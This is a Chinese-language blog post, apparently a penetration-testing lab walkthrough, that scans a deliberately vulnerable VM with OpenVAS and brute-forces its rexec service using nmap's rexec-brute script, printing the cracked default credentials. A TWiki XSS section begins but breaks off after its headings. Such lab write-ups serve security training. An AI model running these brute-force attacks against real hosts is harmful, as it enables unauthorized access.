渗透测试靶机实战---01
渗透测试前期准备工作:
1. 靶机搭建 (网上很多,可直接找到现成的,具体搭建过程略过)
2. OpenVAS 扫描靶机得出漏洞报告
1. OpenVas 搭建步骤可参照:https://blog.51cto.com/linhong/2134910?source=drh
2. 报告地址:https://download.csdn.net/download/m0_37268841/11855947
3.漏洞明细:
渗透测试实战:
1. rexec Passwordless / Unencrypted Cleartext Login
root@kali:~# nmap -p 512 --script rexec-brute *.*.*.* (here input the ipaddress)
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-12 13:39 CST
Nmap scan report for 192.168.10.149
Host is up (0.081s latency).
PORT STATE SERVICE
512/tcp open exec
| rexec-brute:
| Accounts:
| root:root - Valid credentials
| netadmin:netadmin - Valid credentials
| user:user - Valid credentials
| guest:guest - Valid credentials
| web:12345 - Valid credentials
| webadmin:webadmin - Valid credentials
| administrator:administrator - Valid credentials
| sysadmin:sysadmin - Valid credentials
| admin:admin - Valid credentials
| test:test - Valid credentials
|_ Statistics: Performed 26 guesses in 1 seconds, average tps: 26.0
Nmap done: 1 IP address (1 host up) scanned in 2.02 seconds
root@kali:~#
可以看到通过这个漏洞,用户名/密码都能爆出来。
2. TWiki XSS and Command Execution Vulnerabilities (Port: 80)
1. 这个高危漏洞属于应用层的漏洞,web页面的漏洞
2. 这边可以针对Twiki进行扫描:
3.利用XSS漏洞: